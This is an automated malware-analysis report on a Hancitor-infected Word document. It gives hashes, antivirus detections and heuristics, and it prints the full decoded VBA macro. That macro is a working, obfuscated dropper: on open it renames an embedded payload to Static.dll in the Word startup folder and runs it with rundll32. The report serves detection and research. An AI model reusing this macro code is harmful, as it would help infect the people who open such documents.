Hancitor — Office (OOXML) malware analysis

Static analysis result for SHA-256 29895946a5e2cfde…

MALICIOUS

Office (OOXML)

Size: 718.2 KB
Created: 2021-03-18 05:31:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-01
MD5: c308b1046bb262f489220da6718ceca6
SHA-1: c4ba3a3717e40e0d608913ee6dea167e89231c01
SHA-256: 29895946a5e2cfdeb14e0d89d66cf41277e31a5262dd38c674ffc47d6904256b
Risk score: 210

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Hancitor-9845854-0. The VBA macro code contains a Document_Open subroutine that calls a function to execute a payload. The script uses ShellExecuteA to run a constructed executable path, likely downloaded by the embedded OLE object.

Heuristics (6)

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)

Extracted artifacts (6)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size

macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5030 bytes
SHA-256: 9d7b2a93206eb3e44f1f97fefee1900f698e0d6bc85c6ed6eb80649305fd09e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

  Private Declare PtrSafe Function Hogo Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long

Private Const SW_SHOWNORMAL = 1

Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()
Dim nvbnf As String
 Dim yy As String

 Dim bcvxz As String
nvbnf = "\Static.d"
Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pafh As String
pafh = iep
 bcvxz = pafh
Dim geto As String
Dim pus As String

geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
iof = iof & "2"
Dim hgl As String
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "." & ter & "xe"
 Dim fps As String
 fps = "r"
Dim laz As String
laz = "l"
 Dim fa As String
 fa = fps & "u" & jsd & "l" & laz & hh


hgl = ks
yy = bcvxz & nvbnf & hgl & hgl & ",LSAKWTRUDIO"

  Hogo 0, vbNullString, _
    fa, yy, _
     vbNullString, SW_SHOWNORMAL
End If
End Sub



Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
Dim pafh As String
pafh = iep
hor = pafh
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)
Dim uuj As String
uuj = "\msals.pumpl"
strFileExists = Dir(RootPath & uuj)
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs
Dim kkl As String

kkl = Application.Run("Getme", vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "Static.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", RootPath)

      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()

Dim jos As String
Dim pafh As String
pafh = iep
jos = pafh

 
 If Dir(jos & "\" & "Static.d" & "l" & "l") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function






Function ks()
Dim askl As String
askl = fuxk
ks = Left(askl, 1)
End Function




Sub nm(ololow As String)
Dim pafh As String
pafh = iep
  Name ololow & "\msals.pumpl" As pafh & "\" & "Static.d" & "l" & "l"
End Sub


Attribute VB_Name = "Module2"
Sub hi(myhome As String)
Dim plop As String
Dim pafh As String
pafh = iep
plop = pafh
Call jop(myhome, plop & "\" & "Static.d" & "l" & "l")
End Sub


Sub hhhhh()
Dim posl As String
Dim pafh As String
pafh = iep
posl = pafh
Dim ntgs
Dim sda
Call cvbc
    ntgs = 50
sda = 49
Dim jos As String
jos = posl
Dim yer As String
yer = "Loc" & "al" & "\Te" & "mp"
While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & yer)
  Selection.TypeBackspace
   

End Sub











Function lka(ff As String)
lka = ff
End Function






Attribute VB_Name = "Module3"



Function iep()
iep = Options.DefaultFilePath(wdStartupPath)
End Function





Attribute VB_Name = "Module4"


Sub checkthe(sf As String)

Dim pafh As String
pafh = iep

Dim ololow As String
ololow = sf
Dim nothings As String
nothings = 2

    If Dir(sf & "\msals.pumpl") = "" Then
    
    Else
         If Dir(nothings) = "" Then

        Call nm(ololow)
    Else
   Exit Sub
    End If
  
    End If
End Sub





Sub jop(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
Call asfa
End Sub



Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub


Sub asfa()
   Selection.Copy
End Sub







Attribute VB_Name = "Module5"


Sub rnee(myhome As String, hsa As String)

Name myhome & "\msals.pu" & "mpl" As hsa
End Sub





Function fuxk()
fuxk = ThisDocument.Tables(1).Cell(1, 1).Range.Text
End Function

ooxml_oleobject_00.bin | ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject1.bin | 225280 bytes
SHA-256: 90009f21c2f99f31099752c6841bb44bf53c6a510c52a627fb328a1baad46c6e
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely

ooxml_oleobject_00_ole10native_00.bin | ole-package | OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native | 215373 bytes
SHA-256: ec312239eb3bd40cdc3c9964847444f5a5583ac226e747414c60cdf561614a57
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely

ooxml_oleobject_00_ole10native_00_msals.pumpl | ole-package-payload | OOXML word/embeddings/oleObject1.bin Ole10Native payload: display_name=msals.pumpl; full_path=C:\Users\MyPc\AppData\Local\Temp\msals.pumpl; temp_path=; def_file= | 215040 bytes
SHA-256: 0ef38183eb6fd4c30d85ef87c6015e0ebf5b5b911ad17f462bd105b1dcceac57
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 40448 bytes
SHA-256: 99c4c31a2dbb07087df1f6fe403ee6d3f029b4af46c4bc802074621f307dfed8
Detection
ClamAV: Doc.Dropper.Hancitor-9845854-0
Obfuscation or payload: unlikely

emf_00.emf | ooxml-emf | OOXML EMF part: word/media/image2.emf | 5000 bytes
SHA-256: beb0d77eba27e18607561fa6f997202e3645395c0f9b9fe78610523149701608